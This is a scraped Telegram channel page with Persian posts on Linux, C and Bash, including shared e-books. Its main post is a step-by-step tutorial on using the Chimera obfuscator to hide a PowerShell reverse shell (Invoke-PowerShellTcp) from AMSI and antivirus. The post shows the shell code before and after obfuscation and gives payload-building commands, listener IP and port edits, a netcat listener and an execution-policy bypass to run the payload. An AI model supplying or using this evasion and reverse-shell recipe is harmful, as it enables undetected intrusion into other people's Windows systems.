Kernel Kudos – Telegram
Kernel Kudos
1.74K subscribers
110 photos
50 videos
112 files
256 links
🪐 This channel talks about: C, Linux, Bash, and so on 🕸️

🌀 Buy Me Coffee
USDT BEP20 : 0xbc8e52af7b46461b8076085Be771F465E26A9Dfd

🐞 YouTube: https://youtube.com/@KernelKudos

Chat: { https://news.1rj.ru/str/+ftxZVA8V_ns5ZmY8 }

🔴 whoami : { @FirstTarokh }
Download Telegram
بین هوش مصنوعی و بافر هگزی که بهش دادم تبدیل کنه به کاراکتر سوءتفاهم پیش اومده . . . .
🤣9
AI Girlfriend Went Down After CEO Jailed for Setting His Apartment on Fire
Article, Comments
1
Kernel Kudos
Web_Scraping_with_Python_Successfully_scrape_data_from_any_website1.pdf
#Web scraping with python

🔸 وب اسکرپینگ با پایتون

#پایتون #وب
1👍1
داخل کانال قبل فیلم هم رکورد میشد ، ( خودم فیلم رکورد میکردم ، لینوکس تدریس میشد ، کوئیز می‌گرفتیم و غیره )
داخل این کانال هم همین روند رو پیاده میکنیم یک مقدار که ممبرها افزایش پیدا بکنه .
گزینه های روی میز رو بهتون میگم، طبق انتخاب خودتون و شرایط پیش رو ، یکی از مباحث رو استارت می‌زنیم و فیلم رکورد میکنیم 🕷️🕸️

#LInux #Cprogramming #POSIX
2👍1
1
Kernel Kudos
introduction-to-bash-noscripting-dark.pdf
#Bash Scripting Introduction

🔸 For those who have familiarity with Linux and it's bash and want to improve their knowledge in noscripting and automating Linux tasks .

این کتاب بهتون ایده میده . ولی خب اول باید لینوکس بلد باشید بعد برید سراغش
3
ابزار Chimera ابزاری برای Obfuscate کردن اسکریپ های پاورشل برای بایپس AMSI ( Anti Malware Scan Interface ) و انتی ویروس ها هست.

تیکه کد زیر بخشی از Invoke-PowerShellTCP.ps1 هست که توسط 25 تا از انتی ویروس ها شناسایی شده : ( مشاهده عکس )

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`n Copyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

اما تیکه کد زیر بعد از Obfuscate کردن کد بالا توسط ابزار Chimera هست که هیچ آنتی ویروسی نتونسته تشخیص بده : ( مشاهده عکس )

$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov = $jYODNAbvrcYMGaAnZHZwE."$bnyEOfzNcZkkuogkqgKbfmmkvB$ZSshncYvoHKvlKTEanAhJkpKSIxQKkTZJBEahFz$KKApRDtjBkYfJhiVUDOlRxLHmOTOraapTALS"()
[bYte[]]$mOmMDiAfdJwklSzJCUFzcUmjONtNWN = 0..65535|%{0}
$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK = ([teXt.enCoDInG]::AsCII)."$mbKdotKJjMWJhAignlHUS$GhPYzrThsgZeBPkkxVKpfNvFPXaYNqOLBm"("WInDows Powershell rUnnInG As User " + $TgDXkBADxbzEsKLWOwPoF:UsernAMe + " on " + $TgDXkBADxbzEsKLWOwPoF:CoMPUternAMe + "`n CoPYrIGht (C) 2015 MICrosoft CorPorAtIon. All rIGhts reserveD.`n`n")
$xdgIPkCcKmvqoXAYKaOiPdhKXIsFBDov.WrIte($PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK,0,$PqJfKJLVEgPdfemZPpuJOTPILYisfYHxUqmmjUlKkqK.LenGth)


نحوه ی نصب در Linux :
1. نصب پیش نیاز ها :
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git

2. کلون کردن ریپو :
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera

3. تغییر سطح دسترسی اسکریپت به روت ( اگرکاربر روت نیستید ) :
sudo chown root:root -R /opt/chimera/

4. تغییر مسیر به opt/chimera/ :
cd /opt/chimera/

5. تغییر دسترسی اسکریپت به قابلیت اجرا شدن :
sudo chmod +x chimera.sh

6. نهایتا با دستور زیر میتونید اسکریپت رو اجراکنید :
./chimera.sh —help

نحوه ی استفاده از اسکریپت :
1. ساخت Payload :
./chimera --file Shell_Code.ps1 --all --output /tmp/payload.ps1

2. جایگزین کردن ListenerIP/TargetIP و ListenerPort/TargetPort در داخل پیبود :
1.2 تغییر ایپی :
sed -i 's/Listener_IP/Target_IP/g' shells/Payload.ps1
2.2 تغییر پورت :
پورت دیفالت اسکریپت 444 هستش :
sed -i 's/4444/Target_Port/g' shells/*.ps1

گرفتن دسترسی :
1. ایجاد Listener در لینوکس با NetCat :
nc -v -l -p 4444
2. فایل رو روی پاورشل ویندوز با دستور زیر اجرا کنید :
powershell.exe -ep bypass C:\<PATH>\Payload.ps1

و تمام.
امیدوارم از آموزش خوشتون بیاد...
Author : X P 4
Special Tnx to : AK47
🔥2